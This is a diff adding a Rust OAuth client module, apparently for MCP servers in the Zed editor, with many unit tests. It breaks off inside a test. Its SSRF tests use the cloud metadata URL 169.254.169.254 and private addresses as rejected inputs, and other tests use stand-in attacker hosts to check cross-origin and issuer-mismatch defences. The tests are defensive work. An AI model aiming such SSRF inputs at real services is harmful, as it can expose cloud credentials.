+ .uri(url.as_str())
+ .header("Accept", "application/json")
+ .body(AsyncBody::default())?;
+
+ let mut response = http_client.send(request).await?;
+
+ if !response.status().is_success() {
+ bail!("HTTP {} fetching {}", response.status(), url);
+ }
+
+ let mut body = String::new();
+ response.body_mut().read_to_string(&mut body).await?;
+ serde_json::from_str(&body).with_context(|| format!("failed to parse JSON from {}", url))
+}
+
+// -- Serde response types for discovery --------------------------------------
+
+#[derive(Debug, Deserialize)]
+struct ProtectedResourceMetadataResponse {
+ #[serde(default)]
+ resource: Option<Url>,
+ #[serde(default)]
+ authorization_servers: Vec<Url>,
+ #[serde(default)]
+ scopes_supported: Option<Vec<String>>,
+}
+
+#[derive(Debug, Deserialize)]
+struct AuthServerMetadataResponse {
+ #[serde(default)]
+ issuer: Option<Url>,
+ #[serde(default)]
+ authorization_endpoint: Option<Url>,
+ #[serde(default)]
+ token_endpoint: Option<Url>,
+ #[serde(default)]
+ registration_endpoint: Option<Url>,
+ #[serde(default)]
+ scopes_supported: Option<Vec<String>>,
+ #[serde(default)]
+ code_challenge_methods_supported: Option<Vec<String>>,
+ #[serde(default)]
+ client_id_metadata_document_supported: Option<bool>,
+}
+
+#[derive(Debug, Deserialize)]
+struct DcrResponse {
+ client_id: String,
+ #[serde(default)]
+ client_secret: Option<String>,
+}
+
+/// Provides OAuth tokens to the HTTP transport layer.
+///
+/// The transport calls `access_token()` before each request. On a 401 response
+/// it calls `try_refresh()` and retries once if the refresh succeeds.
+#[async_trait]
+pub trait OAuthTokenProvider: Send + Sync {
+ /// Returns the current access token, if one is available.
+ fn access_token(&self) -> Option<String>;
+
+ /// Attempts to refresh the access token. Returns `true` if a new token was
+ /// obtained and the request should be retried.
+ async fn try_refresh(&self) -> Result<bool>;
+}
+
+/// Concrete `OAuthTokenProvider` backed by a full persisted OAuth session and
+/// an HTTP client for token refresh. The same provider type is used both after
+/// an interactive authentication flow and when restoring a saved session from
+/// the keychain on startup.
+pub struct McpOAuthTokenProvider {
+ session: SyncMutex<OAuthSession>,
+ http_client: Arc<dyn HttpClient>,
+ token_refresh_tx: Option<mpsc::UnboundedSender<OAuthSession>>,
+}
+
+impl McpOAuthTokenProvider {
+ pub fn new(
+ session: OAuthSession,
+ http_client: Arc<dyn HttpClient>,
+ token_refresh_tx: Option<mpsc::UnboundedSender<OAuthSession>>,
+ ) -> Self {
+ Self {
+ session: SyncMutex::new(session),
+ http_client,
+ token_refresh_tx,
+ }
+ }
+
+ fn access_token_is_expired(tokens: &OAuthTokens) -> bool {
+ tokens.expires_at.is_some_and(|expires_at| {
+ SystemTime::now()
+ .checked_add(Duration::from_secs(30))
+ .is_some_and(|now_with_buffer| expires_at <= now_with_buffer)
+ })
+ }
+}
+
+#[async_trait]
+impl OAuthTokenProvider for McpOAuthTokenProvider {
+ fn access_token(&self) -> Option<String> {
+ let session = self.session.lock();
+ if Self::access_token_is_expired(&session.tokens) {
+ return None;
+ }
+ Some(session.tokens.access_token.clone())
+ }
+
+ async fn try_refresh(&self) -> Result<bool> {
+ let (refresh_token, token_endpoint, resource, client_id) = {
+ let session = self.session.lock();
+ match session.tokens.refresh_token.clone() {
+ Some(refresh_token) => (
+ refresh_token,
+ session.token_endpoint.clone(),
+ session.resource.clone(),
+ session.client_registration.client_id.clone(),
+ ),
+ None => return Ok(false),
+ }
+ };
+
+ let resource_str = canonical_server_uri(&resource);
+
+ match refresh_tokens(
+ &self.http_client,
+ &token_endpoint,
+ &refresh_token,
+ &client_id,
+ &resource_str,
+ )
+ .await
+ {
+ Ok(mut new_tokens) => {
+ if new_tokens.refresh_token.is_none() {
+ new_tokens.refresh_token = Some(refresh_token);
+ }
+
+ {
+ let mut session = self.session.lock();
+ session.tokens = new_tokens;
+
+ if let Some(ref tx) = self.token_refresh_tx {
+ tx.unbounded_send(session.clone()).ok();
+ }
+ }
+
+ Ok(true)
+ }
+ Err(err) => {
+ log::warn!("OAuth token refresh failed: {}", err);
+ Ok(false)
+ }
+ }
+ }
+}
+
+#[cfg(test)]
+mod tests {
+ use super::*;
+ use http_client::Response;
+
+ // -- require_https_or_loopback tests ------------------------------------
+
+ #[test]
+ fn test_require_https_or_loopback_accepts_https() {
+ let url = Url::parse("https://auth.example.com/token").unwrap();
+ assert!(require_https_or_loopback(&url).is_ok());
+ }
+
+ #[test]
+ fn test_require_https_or_loopback_rejects_http_remote() {
+ let url = Url::parse("http://auth.example.com/token").unwrap();
+ assert!(require_https_or_loopback(&url).is_err());
+ }
+
+ #[test]
+ fn test_require_https_or_loopback_accepts_http_127_0_0_1() {
+ let url = Url::parse("http://127.0.0.1:8080/callback").unwrap();
+ assert!(require_https_or_loopback(&url).is_ok());
+ }
+
+ #[test]
+ fn test_require_https_or_loopback_accepts_http_ipv6_loopback() {
+ let url = Url::parse("http://[::1]:8080/callback").unwrap();
+ assert!(require_https_or_loopback(&url).is_ok());
+ }
+
+ #[test]
+ fn test_require_https_or_loopback_accepts_http_localhost() {
+ let url = Url::parse("http://localhost:8080/callback").unwrap();
+ assert!(require_https_or_loopback(&url).is_ok());
+ }
+
+ #[test]
+ fn test_require_https_or_loopback_accepts_http_localhost_case_insensitive() {
+ let url = Url::parse("http://LOCALHOST:8080/callback").unwrap();
+ assert!(require_https_or_loopback(&url).is_ok());
+ }
+
+ #[test]
+ fn test_require_https_or_loopback_rejects_http_non_loopback_ip() {
+ let url = Url::parse("http://192.168.1.1:8080/token").unwrap();
+ assert!(require_https_or_loopback(&url).is_err());
+ }
+
+ #[test]
+ fn test_require_https_or_loopback_rejects_ftp() {
+ let url = Url::parse("ftp://auth.example.com/token").unwrap();
+ assert!(require_https_or_loopback(&url).is_err());
+ }
+
+ // -- validate_oauth_url (SSRF) tests ------------------------------------
+
+ #[test]
+ fn test_validate_oauth_url_accepts_https_public() {
+ let url = Url::parse("https://auth.example.com/token").unwrap();
+ assert!(validate_oauth_url(&url).is_ok());
+ }
+
+ #[test]
+ fn test_validate_oauth_url_rejects_private_ipv4_10() {
+ let url = Url::parse("https://10.0.0.1/token").unwrap();
+ assert!(validate_oauth_url(&url).is_err());
+ }
+
+ #[test]
+ fn test_validate_oauth_url_rejects_private_ipv4_172() {
+ let url = Url::parse("https://172.16.0.1/token").unwrap();
+ assert!(validate_oauth_url(&url).is_err());
+ }
+
+ #[test]
+ fn test_validate_oauth_url_rejects_private_ipv4_192() {
+ let url = Url::parse("https://192.168.1.1/token").unwrap();
+ assert!(validate_oauth_url(&url).is_err());
+ }
+
+ #[test]
+ fn test_validate_oauth_url_rejects_link_local() {
+ let url = Url::parse("https://169.254.169.254/latest/meta-data/").unwrap();
+ assert!(validate_oauth_url(&url).is_err());
+ }
+
+ #[test]
+ fn test_validate_oauth_url_rejects_ipv6_ula() {
+ let url = Url::parse("https://[fd12:3456:789a::1]/token").unwrap();
+ assert!(validate_oauth_url(&url).is_err());
+ }
+
+ #[test]
+ fn test_validate_oauth_url_rejects_ipv6_unspecified() {
+ let url = Url::parse("https://[::]/token").unwrap();
+ assert!(validate_oauth_url(&url).is_err());
+ }
+
+ #[test]
+ fn test_validate_oauth_url_rejects_ipv4_mapped_ipv6_private() {
+ let url = Url::parse("https://[::ffff:10.0.0.1]/token").unwrap();
+ assert!(validate_oauth_url(&url).is_err());
+ }
+
+ #[test]
+ fn test_validate_oauth_url_rejects_ipv4_mapped_ipv6_link_local() {
+ let url = Url::parse("https://[::ffff:169.254.169.254]/token").unwrap();
+ assert!(validate_oauth_url(&url).is_err());
+ }
+
+ #[test]
+ fn test_validate_oauth_url_allows_http_loopback() {
+ // Loopback is permitted (it's our callback server).
+ let url = Url::parse("http://127.0.0.1:8080/callback").unwrap();
+ assert!(validate_oauth_url(&url).is_ok());
+ }
+
+ #[test]
+ fn test_validate_oauth_url_allows_https_public_ip() {
+ let url = Url::parse("https://93.184.216.34/token").unwrap();
+ assert!(validate_oauth_url(&url).is_ok());
+ }
+
+ // -- parse_www_authenticate tests ----------------------------------------
+
+ #[test]
+ fn test_parse_www_authenticate_with_resource_metadata_and_scope() {
+ let header = r#"Bearer resource_metadata="https://mcp.example.com/.well-known/oauth-protected-resource", scope="files:read user:profile""#;
+ let result = parse_www_authenticate(header).unwrap();
+
+ assert_eq!(
+ result.resource_metadata.as_ref().map(|u| u.as_str()),
+ Some("https://mcp.example.com/.well-known/oauth-protected-resource")
+ );
+ assert_eq!(
+ result.scope,
+ Some(vec!["files:read".to_string(), "user:profile".to_string()])
+ );
+ assert_eq!(result.error, None);
+ }
+
+ #[test]
+ fn test_parse_www_authenticate_resource_metadata_only() {
+ let header = r#"Bearer resource_metadata="https://mcp.example.com/.well-known/oauth-protected-resource""#;
+ let result = parse_www_authenticate(header).unwrap();
+
+ assert_eq!(
+ result.resource_metadata.as_ref().map(|u| u.as_str()),
+ Some("https://mcp.example.com/.well-known/oauth-protected-resource")
+ );
+ assert_eq!(result.scope, None);
+ }
+
+ #[test]
+ fn test_parse_www_authenticate_bare_bearer() {
+ let result = parse_www_authenticate("Bearer").unwrap();
+ assert_eq!(result.resource_metadata, None);
+ assert_eq!(result.scope, None);
+ }
+
+ #[test]
+ fn test_parse_www_authenticate_with_error() {
+ let header = r#"Bearer error="insufficient_scope", scope="files:read files:write", resource_metadata="https://mcp.example.com/.well-known/oauth-protected-resource", error_description="Additional file write permission required""#;
+ let result = parse_www_authenticate(header).unwrap();
+
+ assert_eq!(result.error, Some(BearerError::InsufficientScope));
+ assert_eq!(
+ result.error_description.as_deref(),
+ Some("Additional file write permission required")
+ );
+ assert_eq!(
+ result.scope,
+ Some(vec!["files:read".to_string(), "files:write".to_string()])
+ );
+ assert!(result.resource_metadata.is_some());
+ }
+
+ #[test]
+ fn test_parse_www_authenticate_invalid_token_error() {
+ let header =
+ r#"Bearer error="invalid_token", error_description="The access token expired""#;
+ let result = parse_www_authenticate(header).unwrap();
+ assert_eq!(result.error, Some(BearerError::InvalidToken));
+ }
+
+ #[test]
+ fn test_parse_www_authenticate_invalid_request_error() {
+ let header = r#"Bearer error="invalid_request""#;
+ let result = parse_www_authenticate(header).unwrap();
+ assert_eq!(result.error, Some(BearerError::InvalidRequest));
+ }
+
+ #[test]
+ fn test_parse_www_authenticate_unknown_error() {
+ let header = r#"Bearer error="some_future_error""#;
+ let result = parse_www_authenticate(header).unwrap();
+ assert_eq!(result.error, Some(BearerError::Other));
+ }
+
+ #[test]
+ fn test_parse_www_authenticate_rejects_non_bearer() {
+ let result = parse_www_authenticate("Basic realm=\"example\"");
+ assert!(result.is_err());
+ }
+
+ #[test]
+ fn test_parse_www_authenticate_case_insensitive_scheme() {
+ let header = r#"bearer resource_metadata="https://example.com/.well-known/oauth-protected-resource""#;
+ let result = parse_www_authenticate(header).unwrap();
+ assert!(result.resource_metadata.is_some());
+ }
+
+ #[test]
+ fn test_parse_www_authenticate_multiline_style() {
+ // Some servers emit the header spread across multiple lines joined by
+ // whitespace, as shown in the spec examples.
+ let header = "Bearer resource_metadata=\"https://mcp.example.com/.well-known/oauth-protected-resource\",\n scope=\"files:read\"";
+ let result = parse_www_authenticate(header).unwrap();
+ assert!(result.resource_metadata.is_some());
+ assert_eq!(result.scope, Some(vec!["files:read".to_string()]));
+ }
+
+ #[test]
+ fn test_protected_resource_metadata_urls_with_path() {
+ let server_url = Url::parse("https://api.example.com/v1/mcp").unwrap();
+ let urls = protected_resource_metadata_urls(&server_url);
+
+ assert_eq!(urls.len(), 2);
+ assert_eq!(
+ urls[0].as_str(),
+ "https://api.example.com/.well-known/oauth-protected-resource/v1/mcp"
+ );
+ assert_eq!(
+ urls[1].as_str(),
+ "https://api.example.com/.well-known/oauth-protected-resource"
+ );
+ }
+
+ #[test]
+ fn test_protected_resource_metadata_urls_without_path() {
+ let server_url = Url::parse("https://mcp.example.com").unwrap();
+ let urls = protected_resource_metadata_urls(&server_url);
+
+ assert_eq!(urls.len(), 1);
+ assert_eq!(
+ urls[0].as_str(),
+ "https://mcp.example.com/.well-known/oauth-protected-resource"
+ );
+ }
+
+ #[test]
+ fn test_auth_server_metadata_urls_with_path() {
+ let issuer = Url::parse("https://auth.example.com/tenant1").unwrap();
+ let urls = auth_server_metadata_urls(&issuer);
+
+ assert_eq!(urls.len(), 3);
+ assert_eq!(
+ urls[0].as_str(),
+ "https://auth.example.com/.well-known/oauth-authorization-server/tenant1"
+ );
+ assert_eq!(
+ urls[1].as_str(),
+ "https://auth.example.com/.well-known/openid-configuration/tenant1"
+ );
+ assert_eq!(
+ urls[2].as_str(),
+ "https://auth.example.com/tenant1/.well-known/openid-configuration"
+ );
+ }
+
+ #[test]
+ fn test_auth_server_metadata_urls_without_path() {
+ let issuer = Url::parse("https://auth.example.com").unwrap();
+ let urls = auth_server_metadata_urls(&issuer);
+
+ assert_eq!(urls.len(), 2);
+ assert_eq!(
+ urls[0].as_str(),
+ "https://auth.example.com/.well-known/oauth-authorization-server"
+ );
+ assert_eq!(
+ urls[1].as_str(),
+ "https://auth.example.com/.well-known/openid-configuration"
+ );
+ }
+
+ // -- Canonical server URI tests ------------------------------------------
+
+ #[test]
+ fn test_canonical_server_uri_simple() {
+ let url = Url::parse("https://mcp.example.com").unwrap();
+ assert_eq!(canonical_server_uri(&url), "https://mcp.example.com");
+ }
+
+ #[test]
+ fn test_canonical_server_uri_with_path() {
+ let url = Url::parse("https://mcp.example.com/v1/mcp").unwrap();
+ assert_eq!(canonical_server_uri(&url), "https://mcp.example.com/v1/mcp");
+ }
+
+ #[test]
+ fn test_canonical_server_uri_strips_trailing_slash() {
+ let url = Url::parse("https://mcp.example.com/").unwrap();
+ assert_eq!(canonical_server_uri(&url), "https://mcp.example.com");
+ }
+
+ #[test]
+ fn test_canonical_server_uri_preserves_port() {
+ let url = Url::parse("https://mcp.example.com:8443").unwrap();
+ assert_eq!(canonical_server_uri(&url), "https://mcp.example.com:8443");
+ }
+
+ #[test]
+ fn test_canonical_server_uri_lowercases() {
+ let url = Url::parse("HTTPS://MCP.Example.COM/Server/MCP").unwrap();
+ assert_eq!(
+ canonical_server_uri(&url),
+ "https://mcp.example.com/Server/MCP"
+ );
+ }
+
+ // -- Scope selection tests -----------------------------------------------
+
+ #[test]
+ fn test_select_scopes_prefers_www_authenticate() {
+ let www_auth = WwwAuthenticate {
+ resource_metadata: None,
+ scope: Some(vec!["files:read".into()]),
+ error: None,
+ error_description: None,
+ };
+ let resource_meta = ProtectedResourceMetadata {
+ resource: Url::parse("https://example.com").unwrap(),
+ authorization_servers: vec![],
+ scopes_supported: Some(vec!["files:read".into(), "files:write".into()]),
+ };
+ assert_eq!(select_scopes(&www_auth, &resource_meta), vec!["files:read"]);
+ }
+
+ #[test]
+ fn test_select_scopes_falls_back_to_resource_metadata() {
+ let www_auth = WwwAuthenticate {
+ resource_metadata: None,
+ scope: None,
+ error: None,
+ error_description: None,
+ };
+ let resource_meta = ProtectedResourceMetadata {
+ resource: Url::parse("https://example.com").unwrap(),
+ authorization_servers: vec![],
+ scopes_supported: Some(vec!["admin".into()]),
+ };
+ assert_eq!(select_scopes(&www_auth, &resource_meta), vec!["admin"]);
+ }
+
+ #[test]
+ fn test_select_scopes_empty_when_nothing_available() {
+ let www_auth = WwwAuthenticate {
+ resource_metadata: None,
+ scope: None,
+ error: None,
+ error_description: None,
+ };
+ let resource_meta = ProtectedResourceMetadata {
+ resource: Url::parse("https://example.com").unwrap(),
+ authorization_servers: vec![],
+ scopes_supported: None,
+ };
+ assert!(select_scopes(&www_auth, &resource_meta).is_empty());
+ }
+
+ // -- Client registration strategy tests ----------------------------------
+
+ #[test]
+ fn test_registration_strategy_prefers_cimd() {
+ let metadata = AuthServerMetadata {
+ issuer: Url::parse("https://auth.example.com").unwrap(),
+ authorization_endpoint: Url::parse("https://auth.example.com/authorize").unwrap(),
+ token_endpoint: Url::parse("https://auth.example.com/token").unwrap(),
+ registration_endpoint: Some(Url::parse("https://auth.example.com/register").unwrap()),
+ scopes_supported: None,
+ code_challenge_methods_supported: Some(vec!["S256".into()]),
+ client_id_metadata_document_supported: true,
+ };
+ assert_eq!(
+ determine_registration_strategy(&metadata),
+ ClientRegistrationStrategy::Cimd {
+ client_id: CIMD_URL.to_string(),
+ }
+ );
+ }
+
+ #[test]
+ fn test_registration_strategy_falls_back_to_dcr() {
+ let reg_endpoint = Url::parse("https://auth.example.com/register").unwrap();
+ let metadata = AuthServerMetadata {
+ issuer: Url::parse("https://auth.example.com").unwrap(),
+ authorization_endpoint: Url::parse("https://auth.example.com/authorize").unwrap(),
+ token_endpoint: Url::parse("https://auth.example.com/token").unwrap(),
+ registration_endpoint: Some(reg_endpoint.clone()),
+ scopes_supported: None,
+ code_challenge_methods_supported: Some(vec!["S256".into()]),
+ client_id_metadata_document_supported: false,
+ };
+ assert_eq!(
+ determine_registration_strategy(&metadata),
+ ClientRegistrationStrategy::Dcr {
+ registration_endpoint: reg_endpoint,
+ }
+ );
+ }
+
+ #[test]
+ fn test_registration_strategy_unavailable() {
+ let metadata = AuthServerMetadata {
+ issuer: Url::parse("https://auth.example.com").unwrap(),
+ authorization_endpoint: Url::parse("https://auth.example.com/authorize").unwrap(),
+ token_endpoint: Url::parse("https://auth.example.com/token").unwrap(),
+ registration_endpoint: None,
+ scopes_supported: None,
+ code_challenge_methods_supported: Some(vec!["S256".into()]),
+ client_id_metadata_document_supported: false,
+ };
+ assert_eq!(
+ determine_registration_strategy(&metadata),
+ ClientRegistrationStrategy::Unavailable,
+ );
+ }
+
+ // -- PKCE tests ----------------------------------------------------------
+
+ #[test]
+ fn test_pkce_challenge_verifier_length() {
+ let pkce = generate_pkce_challenge();
+ // 32 random bytes → 43 base64url chars (no padding).
+ assert_eq!(pkce.verifier.len(), 43);
+ }
+
+ #[test]
+ fn test_pkce_challenge_is_valid_base64url() {
+ let pkce = generate_pkce_challenge();
+ for c in pkce.verifier.chars().chain(pkce.challenge.chars()) {
+ assert!(
+ c.is_ascii_alphanumeric() || c == '-' || c == '_',
+ "invalid base64url character: {}",
+ c
+ );
+ }
+ }
+
+ #[test]
+ fn test_pkce_challenge_is_s256_of_verifier() {
+ let pkce = generate_pkce_challenge();
+ let engine = base64::engine::general_purpose::URL_SAFE_NO_PAD;
+ let expected_digest = Sha256::digest(pkce.verifier.as_bytes());
+ let expected_challenge = engine.encode(expected_digest);
+ assert_eq!(pkce.challenge, expected_challenge);
+ }
+
+ #[test]
+ fn test_pkce_challenges_are_unique() {
+ let a = generate_pkce_challenge();
+ let b = generate_pkce_challenge();
+ assert_ne!(a.verifier, b.verifier);
+ }
+
+ // -- Authorization URL tests ---------------------------------------------
+
+ #[test]
+ fn test_build_authorization_url() {
+ let metadata = AuthServerMetadata {
+ issuer: Url::parse("https://auth.example.com").unwrap(),
+ authorization_endpoint: Url::parse("https://auth.example.com/authorize").unwrap(),
+ token_endpoint: Url::parse("https://auth.example.com/token").unwrap(),
+ registration_endpoint: None,
+ scopes_supported: None,
+ code_challenge_methods_supported: Some(vec!["S256".into()]),
+ client_id_metadata_document_supported: true,
+ };
+ let pkce = PkceChallenge {
+ verifier: "test_verifier".into(),
+ challenge: "test_challenge".into(),
+ };
+ let url = build_authorization_url(
+ &metadata,
+ "https://zed.dev/oauth/client-metadata.json",
+ "http://127.0.0.1:12345/callback",
+ &["files:read".into(), "files:write".into()],
+ "https://mcp.example.com",
+ &pkce,
+ "random_state_123",
+ );
+
+ let pairs: std::collections::HashMap<_, _> = url.query_pairs().collect();
+ assert_eq!(pairs.get("response_type").unwrap(), "code");
+ assert_eq!(
+ pairs.get("client_id").unwrap(),
+ "https://zed.dev/oauth/client-metadata.json"
+ );
+ assert_eq!(
+ pairs.get("redirect_uri").unwrap(),
+ "http://127.0.0.1:12345/callback"
+ );
+ assert_eq!(pairs.get("scope").unwrap(), "files:read files:write");
+ assert_eq!(pairs.get("resource").unwrap(), "https://mcp.example.com");
+ assert_eq!(pairs.get("code_challenge").unwrap(), "test_challenge");
+ assert_eq!(pairs.get("code_challenge_method").unwrap(), "S256");
+ assert_eq!(pairs.get("state").unwrap(), "random_state_123");
+ }
+
+ #[test]
+ fn test_build_authorization_url_omits_empty_scope() {
+ let metadata = AuthServerMetadata {
+ issuer: Url::parse("https://auth.example.com").unwrap(),
+ authorization_endpoint: Url::parse("https://auth.example.com/authorize").unwrap(),
+ token_endpoint: Url::parse("https://auth.example.com/token").unwrap(),
+ registration_endpoint: None,
+ scopes_supported: None,
+ code_challenge_methods_supported: Some(vec!["S256".into()]),
+ client_id_metadata_document_supported: false,
+ };
+ let pkce = PkceChallenge {
+ verifier: "v".into(),
+ challenge: "c".into(),
+ };
+ let url = build_authorization_url(
+ &metadata,
+ "client_123",
+ "http://127.0.0.1:9999/callback",
+ &[],
+ "https://mcp.example.com",
+ &pkce,
+ "state",
+ );
+
+ let pairs: std::collections::HashMap<_, _> = url.query_pairs().collect();
+ assert!(!pairs.contains_key("scope"));
+ }
+
+ // -- Token exchange / refresh param tests --------------------------------
+
+ #[test]
+ fn test_token_exchange_params() {
+ let params = token_exchange_params(
+ "auth_code_abc",
+ "client_xyz",
+ "http://127.0.0.1:5555/callback",
+ "verifier_123",
+ "https://mcp.example.com",
+ );
+ let map: std::collections::HashMap<&str, &str> =
+ params.iter().map(|(k, v)| (*k, v.as_str())).collect();
+
+ assert_eq!(map["grant_type"], "authorization_code");
+ assert_eq!(map["code"], "auth_code_abc");
+ assert_eq!(map["redirect_uri"], "http://127.0.0.1:5555/callback");
+ assert_eq!(map["client_id"], "client_xyz");
+ assert_eq!(map["code_verifier"], "verifier_123");
+ assert_eq!(map["resource"], "https://mcp.example.com");
+ }
+
+ #[test]
+ fn test_token_refresh_params() {
+ let params =
+ token_refresh_params("refresh_token_abc", "client_xyz", "https://mcp.example.com");
+ let map: std::collections::HashMap<&str, &str> =
+ params.iter().map(|(k, v)| (*k, v.as_str())).collect();
+
+ assert_eq!(map["grant_type"], "refresh_token");
+ assert_eq!(map["refresh_token"], "refresh_token_abc");
+ assert_eq!(map["client_id"], "client_xyz");
+ assert_eq!(map["resource"], "https://mcp.example.com");
+ }
+
+ // -- Token response tests ------------------------------------------------
+
+ #[test]
+ fn test_token_response_into_tokens_with_expiry() {
+ let response: TokenResponse = serde_json::from_str(
+ r#"{"access_token": "at_123", "refresh_token": "rt_456", "expires_in": 3600, "token_type": "Bearer"}"#,
+ )
+ .unwrap();
+
+ let tokens = response.into_tokens();
+ assert_eq!(tokens.access_token, "at_123");
+ assert_eq!(tokens.refresh_token.as_deref(), Some("rt_456"));
+ assert!(tokens.expires_at.is_some());
+ }
+
+ #[test]
+ fn test_token_response_into_tokens_minimal() {
+ let response: TokenResponse =
+ serde_json::from_str(r#"{"access_token": "at_789"}"#).unwrap();
+
+ let tokens = response.into_tokens();
+ assert_eq!(tokens.access_token, "at_789");
+ assert_eq!(tokens.refresh_token, None);
+ assert_eq!(tokens.expires_at, None);
+ }
+
+ // -- DCR body test -------------------------------------------------------
+
+ #[test]
+ fn test_dcr_registration_body_shape() {
+ let body = dcr_registration_body("http://127.0.0.1:12345/callback");
+ assert_eq!(body["client_name"], "Zed");
+ assert_eq!(body["redirect_uris"][0], "http://127.0.0.1:12345/callback");
+ assert_eq!(body["grant_types"][0], "authorization_code");
+ assert_eq!(body["response_types"][0], "code");
+ assert_eq!(body["token_endpoint_auth_method"], "none");
+ }
+
+ // -- Test helpers for async/HTTP tests -----------------------------------
+
+ fn make_fake_http_client(
+ handler: impl Fn(
+ http_client::Request<AsyncBody>,
+ ) -> std::pin::Pin<
+ Box<dyn std::future::Future<Output = anyhow::Result<Response<AsyncBody>>> + Send>,
+ > + Send
+ + Sync
+ + 'static,
+ ) -> Arc<dyn HttpClient> {
+ http_client::FakeHttpClient::create(handler) as Arc<dyn HttpClient>
+ }
+
+ fn json_response(status: u16, body: &str) -> anyhow::Result<Response<AsyncBody>> {
+ Ok(Response::builder()
+ .status(status)
+ .header("Content-Type", "application/json")
+ .body(AsyncBody::from(body.as_bytes().to_vec()))
+ .unwrap())
+ }
+
+ // -- Discovery integration tests -----------------------------------------
+
+ #[test]
+ fn test_fetch_protected_resource_metadata() {
+ smol::block_on(async {
+ let client = make_fake_http_client(|req| {
+ Box::pin(async move {
+ let uri = req.uri().to_string();
+ if uri.contains(".well-known/oauth-protected-resource") {
+ json_response(
+ 200,
+ r#"{
+ "resource": "https://mcp.example.com",
+ "authorization_servers": ["https://auth.example.com"],
+ "scopes_supported": ["read", "write"]
+ }"#,
+ )
+ } else {
+ json_response(404, "{}")
+ }
+ })
+ });
+
+ let server_url = Url::parse("https://mcp.example.com").unwrap();
+ let www_auth = WwwAuthenticate {
+ resource_metadata: None,
+ scope: None,
+ error: None,
+ error_description: None,
+ };
+
+ let metadata = fetch_protected_resource_metadata(&client, &server_url, &www_auth)
+ .await
+ .unwrap();
+
+ assert_eq!(metadata.resource.as_str(), "https://mcp.example.com/");
+ assert_eq!(metadata.authorization_servers.len(), 1);
+ assert_eq!(
+ metadata.authorization_servers[0].as_str(),
+ "https://auth.example.com/"
+ );
+ assert_eq!(
+ metadata.scopes_supported,
+ Some(vec!["read".to_string(), "write".to_string()])
+ );
+ });
+ }
+
+ #[test]
+ fn test_fetch_protected_resource_metadata_prefers_www_authenticate_url() {
+ smol::block_on(async {
+ let client = make_fake_http_client(|req| {
+ Box::pin(async move {
+ let uri = req.uri().to_string();
+ if uri == "https://mcp.example.com/custom-resource-metadata" {
+ json_response(
+ 200,
+ r#"{
+ "resource": "https://mcp.example.com",
+ "authorization_servers": ["https://auth.example.com"]
+ }"#,
+ )
+ } else {
+ json_response(500, r#"{"error": "should not be called"}"#)
+ }
+ })
+ });
+
+ let server_url = Url::parse("https://mcp.example.com").unwrap();
+ let www_auth = WwwAuthenticate {
+ resource_metadata: Some(
+ Url::parse("https://mcp.example.com/custom-resource-metadata").unwrap(),
+ ),
+ scope: None,
+ error: None,
+ error_description: None,
+ };
+
+ let metadata = fetch_protected_resource_metadata(&client, &server_url, &www_auth)
+ .await
+ .unwrap();
+
+ assert_eq!(metadata.authorization_servers.len(), 1);
+ });
+ }
+
+ #[test]
+ fn test_fetch_protected_resource_metadata_rejects_cross_origin_url() {
+ smol::block_on(async {
+ let client = make_fake_http_client(|req| {
+ Box::pin(async move {
+ let uri = req.uri().to_string();
+ // The cross-origin URL should NOT be fetched; only the
+ // well-known fallback at the server's own origin should be.
+ if uri.contains("attacker.example.com") {
+ panic!("should not fetch cross-origin resource_metadata URL");
+ } else if uri.contains(".well-known/oauth-protected-resource") {
+ json_response(
+ 200,
+ r#"{
+ "resource": "https://mcp.example.com",
+ "authorization_servers": ["https://auth.example.com"]
+ }"#,
+ )
+ } else {
+ json_response(404, "{}")
+ }
+ })
+ });
+
+ let server_url = Url::parse("https://mcp.example.com").unwrap();
+ let www_auth = WwwAuthenticate {
+ resource_metadata: Some(
+ Url::parse("https://attacker.example.com/fake-metadata").unwrap(),
+ ),
+ scope: None,
+ error: None,
+ error_description: None,
+ };
+
+ let metadata = fetch_protected_resource_metadata(&client, &server_url, &www_auth)
+ .await
+ .unwrap();
+
+ // Should have used the fallback well-known URL, not the attacker's.
+ assert_eq!(metadata.resource.as_str(), "https://mcp.example.com/");
+ });
+ }
+
+ #[test]
+ fn test_fetch_auth_server_metadata() {
+ smol::block_on(async {
+ let client = make_fake_http_client(|req| {
+ Box::pin(async move {
+ let uri = req.uri().to_string();
+ if uri.contains(".well-known/oauth-authorization-server") {
+ json_response(
+ 200,
+ r#"{
+ "issuer": "https://auth.example.com",
+ "authorization_endpoint": "https://auth.example.com/authorize",
+ "token_endpoint": "https://auth.example.com/token",
+ "registration_endpoint": "https://auth.example.com/register",
+ "code_challenge_methods_supported": ["S256"],
+ "client_id_metadata_document_supported": true
+ }"#,
+ )
+ } else {
+ json_response(404, "{}")
+ }
+ })
+ });
+
+ let issuer = Url::parse("https://auth.example.com").unwrap();
+ let metadata = fetch_auth_server_metadata(&client, &issuer).await.unwrap();
+
+ assert_eq!(metadata.issuer.as_str(), "https://auth.example.com/");
+ assert_eq!(
+ metadata.authorization_endpoint.as_str(),
+ "https://auth.example.com/authorize"
+ );
+ assert_eq!(
+ metadata.token_endpoint.as_str(),
+ "https://auth.example.com/token"
+ );
+ assert!(metadata.registration_endpoint.is_some());
+ assert!(metadata.client_id_metadata_document_supported);
+ assert_eq!(
+ metadata.code_challenge_methods_supported,
+ Some(vec!["S256".to_string()])
+ );
+ });
+ }
+
+ #[test]
+ fn test_fetch_auth_server_metadata_falls_back_to_oidc() {
+ smol::block_on(async {
+ let client = make_fake_http_client(|req| {
+ Box::pin(async move {
+ let uri = req.uri().to_string();
+ if uri.contains("openid-configuration") {
+ json_response(
+ 200,
+ r#"{
+ "issuer": "https://auth.example.com",
+ "authorization_endpoint": "https://auth.example.com/authorize",
+ "token_endpoint": "https://auth.example.com/token",
+ "code_challenge_methods_supported": ["S256"]
+ }"#,
+ )
+ } else {
+ json_response(404, "{}")
+ }
+ })
+ });
+
+ let issuer = Url::parse("https://auth.example.com").unwrap();
+ let metadata = fetch_auth_server_metadata(&client, &issuer).await.unwrap();
+
+ assert_eq!(
+ metadata.authorization_endpoint.as_str(),
+ "https://auth.example.com/authorize"
+ );
+ assert!(!metadata.client_id_metadata_document_supported);
+ });
+ }
+
+ #[test]
+ fn test_fetch_auth_server_metadata_rejects_issuer_mismatch() {
+ smol::block_on(async {
+ let client = make_fake_http_client(|req| {
+ Box::pin(async move {
+ let uri = req.uri().to_string();
+ if uri.contains(".well-known/oauth-authorization-server") {
+ // Response claims to be a different issuer.
+ json_response(
+ 200,
+ r#"{
+ "issuer": "https://evil.example.com",
+ "authorization_endpoint": "https://evil.example.com/authorize",
+ "token_endpoint": "https://evil.example.com/token",
